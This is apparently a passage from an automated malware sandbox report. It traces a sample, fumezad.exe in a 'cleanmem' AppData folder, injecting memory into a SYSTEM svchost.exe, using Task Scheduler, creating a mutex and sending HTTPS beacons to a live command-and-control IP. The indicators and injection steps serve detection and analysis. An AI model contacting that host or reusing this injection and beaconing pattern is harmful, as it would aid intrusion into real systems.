| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a700, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1615752 |
|
1 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a6c0, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1615768 |
|
4 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a620, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615400 |
|
1 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a578, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615144 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0xffaa246c, protection = PAGE_EXECUTE_READWRITE, size = 1615800 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x10000000, protection = PAGE_READONLY, size = 1615712 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x10001000, protection = PAGE_EXECUTE_READ, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001b000, protection = PAGE_READWRITE, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001e000, protection = PAGE_READONLY, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001f000, protection = PAGE_READONLY, size = 1615744 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x7fffffd3000, size = 712 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0xffaa0000, size = 64 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0xffaa00e8, size = 264 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x7fffffd3018, size = 8 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x77712640, size = 48 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x2c2620, size = 136 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x60000, size = 72 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x50000, size = 544 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x60000, size = 72 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0xffaa246c, size = 22 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x10001000, size = 104448 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001b000, size = 9216 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001e000, size = 512 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001f000, size = 512 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x7fffffd3010, size = 8 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x2c2650, size = 8 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x20000, size = 16 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x20010, size = 110 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x2c2668, size = 16 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x70000, size = 16 |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | advapi32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | shell32.dll | base_address = 0x0 |
|
1 | |
| Load | kernel32.dll | base_address = 0xc0000018 |
|
1 | |
| Load | kernelbase.dll | base_address = 0x0 |
|
1 | |
| Get Filename | shell32.dll | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 |
Service (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeTcbPrivilege, luid = 7 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
Process #38: svchost.exe
379
6
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x55c |
| Parent PID | 0x354 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
358
0x
130
0x
B14
0x
500
0x
ACC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x00080000 | 0x000a8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00130000 | 0x00196fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x0025ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00276fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00281fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x007e0000 | 0x0085cfff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x007e0000 | 0x00824fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009d0000 | 0x00c9efff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x00ca0000 | 0x00d5ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f20000 | 0x00f20000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x01820fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001830000 | 0x01830000 | 0x02030fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0216ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x0222ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x1001ffff | Private Memory | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fffe000 | 0x7fffe000 | 0x7fffefff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0xffaa0000 | 0xffaaafff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7fef61c0000 | 0x7fef6223fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7fef6230000 | 0x7fef62a0fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fefad50000 | 0x7fefad67fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefaff0000 | 0x7fefaffafff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb000000 | 0x7fefb026fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb290000 | 0x7fefb3b6fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7fefc7c0000 | 0x7fefc7c6fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x7fefca20000 | 0x7fefca29fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7fefca60000 | 0x7fefcaabfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7fefcc40000 | 0x7fefcc9afff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7fefcdc0000 | 0x7fefce14fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7fefcf90000 | 0x7fefcfb1fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7fefcfc0000 | 0x7fefd00dfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefd3f0000 | 0x7fefd414fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefd5d0000 | 0x7fefd5defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefd750000 | 0x7fefd8b6fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefd900000 | 0x7fefd94cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefde40000 | 0x7fefde47fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefde50000 | 0x7fefebd7fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x50000, size = 544 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x60000, size = 72 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0xffaa246c, size = 22 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x10001000, size = 104448 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x1001b000, size = 9216 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x1001e000, size = 512 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x1001f000, size = 512 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x7fffffd3010, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x2c2650, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x20000, size = 16 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x20010, size = 110 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x2c2668, size = 16 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x630 | address = 0x70000, size = 16 |
|
1 |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | Data\ | - |
|
1 | |
| Get Info | Data\ | type = file_attributes |
|
1 |
Module (15)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x0 |
|
1 | |
| Load | USERENV.dll | base_address = 0x0 |
|
1 | |
| Load | IPHLPAPI.DLL | base_address = 0x0 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | bcrypt.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Load | ncrypt.dll | base_address = 0x0 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x0 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x0 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x0 |
|
1 | |
| Get Filename | OLEAUT32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 512 |
|
1 | |
| Get Filename | OLEAUT32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 |
System (359)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
334 | |
| Sleep | duration = 3000 milliseconds (3.000 seconds) |
|
15 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Sleep | duration = 20000 milliseconds (20.000 seconds) |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\E0B7509842610 |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 676 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 185.222.202.79 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2228.0 Safari/537.36 |
| Server Name | 185.222.202.79 |
| Server Port | 443 |
| Data Sent | 676 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2228.0 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTPS, server_name = 185.222.202.79, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/ |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/, accept_types = 0, flags = INTERNET_FLAG_SECURE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/ |
|
1 |
